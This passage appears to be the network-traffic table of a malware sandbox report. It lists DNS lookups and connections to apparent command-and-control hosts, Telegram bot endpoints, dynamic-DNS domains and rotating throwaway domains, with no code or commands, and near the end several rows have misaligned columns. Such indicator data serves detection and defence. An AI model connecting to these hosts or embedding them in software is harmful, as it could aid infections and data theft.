| US | 8.8.8.8:53 | 49.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dev.cyberark-igiwax.com | udp |
| US | 44.243.209.238:80 | dev.cyberark-igiwax.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 238.209.243.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| VN | 14.243.221.170:2654 | | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | alien-training.com | udp |
| IE | 52.218.61.44:80 | alien-training.com | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 192.168.2.15:443 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 44.61.218.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | exchange-reasonably.gl.at.ply.gg | udp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8777 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | rddissisifigifidi.net | udp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| BG | 87.120.125.214:443 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| VN | 14.243.221.170:2654 | | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| SE | 193.233.255.106:69 | | tcp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| BG | 87.120.125.214:443 | | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| BG | 87.120.125.214:443 | | tcp |
| BG | 87.120.125.214:443 | | tcp |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| PE | 161.132.57.101:80 | www.grupodulcemar.pe | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | millyscroqwp.shop | udp |
| US | 8.8.8.8:53 | locatedblsoqp.shop | udp |
| US | 8.8.8.8:53 | traineiwnqo.shop | udp |
| US | 8.8.8.8:53 | condedqpwqm.shop | udp |
| US | 8.8.8.8:53 | evoliutwoqm.shop | udp |
| US | 8.8.8.8:53 | stagedchheiqwo.shop | udp |
| US | 8.8.8.8:53 | stamppreewntnq.shop | udp |
| US | 8.8.8.8:53 | caffegclasiqwp.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| RU | 176.113.115.163:80 | 176.113.115.163 | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.115.113.176.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 192.210.150.26:8787 | | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| BG | 87.120.125.214:443 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| VN | 14.243.221.170:2654 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | 23.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| SE | 193.233.255.106:69 | | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| DE | 209.38.221.184:8080 | 209.38.221.184 | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | 21.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.221.38.209.in-addr.arpa | udp |
| DE | 46.235.26.83:8080 | | tcp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 20.83.148.22:80 | | tcp |
| RU | 185.215.113.117:80 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | tacitglibbr.biz | udp |
| US | 172.67.164.37:443 | tacitglibbr.biz | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | immureprech.biz | udp |
| US | 104.21.22.222:443 | immureprech.biz | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 37.164.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.22.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deafeninggeh.biz | udp |
| US | 104.21.32.1:443 | deafeninggeh.biz | tcp |
| US | 8.8.8.8:53 | effecterectz.xyz | udp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | diffuculttan.xyz | udp |
| US | 8.8.8.8:53 | debonairnukk.xyz | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | wrathful-jammy.cyou | udp |
| US | 172.67.206.53:443 | wrathful-jammy.cyou | tcp |
| US | 8.8.8.8:53 | 1.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.206.67.172.in-addr.arpa | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | awake-weaves.cyou | udp |
| US | 172.67.143.116:443 | awake-weaves.cyou | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | sordid-snaked.cyou | udp |
| US | 8.8.8.8:53 | 116.143.67.172.in-addr.arpa | udp |
| US | 104.21.27.63:443 | sordid-snaked.cyou | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| RU | 185.215.113.67:21405 | | tcp |
| US | 8.8.8.8:53 | 63.27.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 108.209.109.20.in-addr.arpa | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| PL | 45.80.158.31:80 | | tcp |
| PL | 45.80.158.31:80 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| IR | 5.134.199.85:40500 | | udp |
| YE | 94.26.219.44:40500 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 85.199.134.5.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | jirafasaltas.fun | udp |
| US | 104.21.57.227:443 | jirafasaltas.fun | tcp |
| US | 8.8.8.8:53 | 227.57.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| MX | 189.252.61.8:40500 | | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 192.210.150.26:8787 | | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 8.61.252.189.in-addr.arpa | udp |
| VN | 14.243.221.170:2654 | | tcp |
| US | 8.8.8.8:53 | cowod.hopto.org | udp |
| US | 20.83.148.22:80 | | tcp |
| DE | 147.28.185.29:80 | 147.28.185.29 | tcp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| US | 192.210.150.26:8787 | | tcp |
| NL | 206.166.251.4:8080 | | tcp |
| US | 8.8.8.8:53 | 29.185.28.147.in-addr.arpa | udp |
| KZ | 92.47.52.79:40500 | | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | 79.52.47.92.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:5152 | twizthash.net | tcp |
| IR | 2.177.40.206:40500 | | udp |
| SE | 193.233.255.106:69 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| US | 20.83.148.22:80 | | tcp |
| FI | 95.217.25.228:443 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | 227.95.123.104.in-addr.arpa | udp |
| PL | 45.80.158.31:80 | | tcp |
| PL | 45.80.158.31:80 | | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| RU | 45.150.24.42:40500 | | udp |
| US | 8.8.8.8:53 | 42.24.150.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lsks.volamngayxua.net | udp |
| VN | 103.200.23.247:80 | lsks.volamngayxua.net | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | 247.23.200.103.in-addr.arpa | udp |
| US | 20.83.148.22:80 | | tcp |
| RU | 185.215.113.67:21405 | | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| IR | 5.239.109.92:40500 | | udp |
| US | 192.210.150.26:8787 | | tcp |
| IR | 2.191.61.218:40500 | | tcp |
| US | 8.8.8.8:53 | 92.109.239.5.in-addr.arpa | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 36.113.215.185.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 38.180.203.11:1010 | | tcp |
| SY | 82.137.239.235:40500 | | udp |
| US | 8.8.8.8:53 | 235.239.137.82.in-addr.arpa | udp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| VN | 14.243.221.170:2654 | | tcp |
| FR | 51.159.4.50:8080 | 51.159.4.50 | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 20.83.148.22:80 | | tcp |
| SE | 151.177.61.79:4782 | | tcp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| IR | 217.171.148.45:40500 | | udp |
| US | 8.8.8.8:53 | 45.148.171.217.in-addr.arpa | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| RU | 185.215.113.67:15206 | | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| KZ | 92.46.40.130:40500 | | udp |
| FI | 95.217.25.228:443 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| N/A | 192.168.190.133:4444 | | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| NL | 62.60.217.159:15666 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| IN | 116.206.151.203:478 | 116.206.151.203 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| SE | 193.233.255.106:69 | | tcp |
| KZ | 213.211.105.70:40500 | | udp |
| US | 8.8.8.8:53 | 203.151.206.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.105.211.213.in-addr.arpa | udp |
| PL | 45.80.158.31:80 | | tcp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| CN | 183.57.21.131:8095 | | tcp |
| RU | 185.215.113.67:21405 | | tcp |
| MX | 189.136.17.247:40500 | | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | 247.17.136.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| IR | 94.183.35.46:40500 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| IR | 78.38.29.237:40500 | | udp |
| US | 8.8.8.8:53 | 237.29.38.78.in-addr.arpa | udp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| VN | 14.243.221.170:2654 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| GB | 38.180.203.11:1010 | | tcp |
| RU | 185.215.113.66:5152 | twizthash.net | tcp |
| SE | 151.177.61.79:4782 | | tcp |
| US | 8.8.8.8:53 | www.pornhub.com | udp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.trafficjunky.com | udp |
| US | 8.8.8.8:53 | ei.phncdn.com | udp |
| GB | 64.210.156.23:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.23:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 206.217.142.166:1234 | | tcp |
| US | 8.8.8.8:53 | 41.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | media.trafficjunky.net | udp |
| US | 8.8.8.8:53 | cdn1-smallimg.phncdn.com | udp |
| US | 66.254.114.156:443 | cdn1-smallimg.phncdn.com | tcp |
| GB | 64.210.156.22:443 | media.trafficjunky.net | tcp |
| GB | 64.210.156.17:443 | media.trafficjunky.net | tcp |
| US | 8.8.8.8:53 | 156.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.201.250.142.in-addr.arpa | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | ss.phncdn.com | udp |
| US | 8.8.8.8:53 | a.adtng.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 192.210.150.26:8787 | | tcp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | ht-cdn2.adtng.com | udp |
| GB | 64.210.156.16:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.16:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.16:443 | ht-cdn2.adtng.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | hw-cdn2.adtng.com | udp |
| GB | 64.210.156.0:443 | hw-cdn2.adtng.com | tcp |
| YE | 134.35.128.189:40500 | | udp |
| US | 8.8.8.8:53 | 171.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.128.35.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| FR | 142.250.74.251:443 | storage.googleapis.com | tcp |
| US | 8.8.8.8:53 | 251.74.250.142.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| FI | 95.217.25.228:443 | | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | | tcp |
| RU | 185.215.113.67:15206 | | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| KZ | 95.59.234.182:40500 | | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | 182.234.59.95.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 8.8.8.8:53 | safe.ywxww.net | udp |
| IR | 95.81.102.72:40500 | | udp |
| US | 8.8.8.8:53 | 72.102.81.95.in-addr.arpa | udp |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 192.210.150.26:8787 | | tcp |
| PL | 45.80.158.31:80 | | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| UZ | 90.156.164.103:40500 | | udp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | 103.164.156.90.in-addr.arpa | udp |
| SE | 193.233.255.106:69 | | tcp |
| RU | 185.215.113.67:21405 | | tcp |
| PK | 182.188.65.58:40500 | | tcp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| MX | 189.141.139.39:40500 | | udp |
| US | 8.8.8.8:53 | 39.139.141.189.in-addr.arpa | udp |
| VN | 14.243.221.170:2654 | | tcp |
| SE | 151.177.61.79:4782 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| GB | 38.180.203.11:1010 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 192.210.150.26:8787 | | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 20.83.148.22:80 | | tcp |
| UZ | 90.156.160.56:40500 | | udp |
| US | 8.8.8.8:53 | 56.160.156.90.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 192.210.150.26:8787 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| UZ | 92.38.19.10:40500 | | udp |
| US | 8.8.8.8:53 | 10.19.38.92.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | t.0000o.xyz | udp |
| US | 199.195.251.23:88 | t.0000o.xyz | tcp |
| US | 8.8.8.8:53 | 23.251.195.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aefieiaehfiaehr.top | udp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| SE | 151.177.61.79:4782 | | tcp |
| VN | 14.243.221.170:2654 | | tcp |
| SY | 82.137.239.235:40500 | | tcp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| AO | 102.215.170.62:40500 | | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 8.8.8.8:53 | 62.170.215.102.in-addr.arpa | udp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| GB | 38.180.203.11:1010 | | tcp |
| RU | 185.215.113.67:21405 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| SE | 193.233.255.106:69 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| UZ | 213.230.99.119:40500 | | udp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| PL | 45.80.158.31:80 | | tcp |
| RU | 188.119.66.185:443 | | tcp |
| US | 8.8.8.8:53 | 208.242.5.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.99.230.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.66.119.188.in-addr.arpa | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| IR | 185.80.102.252:40500 | | udp |
| NL | 31.214.157.206:2024 | | tcp |
| US | 8.8.8.8:53 | 252.102.80.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.157.214.31.in-addr.arpa | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| AO | 154.71.224.9:40500 | | udp |
| RU | 185.215.113.67:15206 | | tcp |
| US | 8.8.8.8:53 | 9.224.71.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 192.210.150.26:8787 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 20.83.148.22:80 | | tcp |
| IR | 93.118.127.143:40500 | | udp |
| VN | 14.243.221.170:2654 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | 143.127.118.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 192.210.150.26:8787 | | tcp |
| RU | 31.8.228.20:40500 | | udp |
| US | 8.8.8.8:53 | 20.228.8.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| SE | 151.177.61.79:4782 | | tcp |
| IR | 2.176.92.74:40500 | | tcp |
| IR | 2.179.117.33:40500 | | udp |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| SE | 193.233.255.106:69 | | tcp |
| US | 8.8.8.8:53 | 33.117.179.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aquafusion.com.co | udp |
| CO | 190.90.160.170:443 | aquafusion.com.co | tcp |
| RU | 185.215.113.67:21405 | | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| PL | 45.80.158.31:80 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| FI | 95.217.25.228:443 | | tcp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| UZ | 62.209.135.143:40500 | | udp |
| US | 20.83.148.22:80 | | tcp |
| GB | 38.180.203.11:1010 | | tcp |
| US | 192.210.150.26:8787 | | tcp |
| US | 8.8.8.8:53 | 143.135.209.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 212.3.146.135:40500 | udp | |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 8.8.8.8:53 | 135.146.3.212.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| VN | 14.243.221.170:2654 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| IN | 59.91.192.115:40500 | udp | |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 8.8.8.8:53 | 115.192.91.59.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| NL | 62.60.217.159:15666 | tcp | |
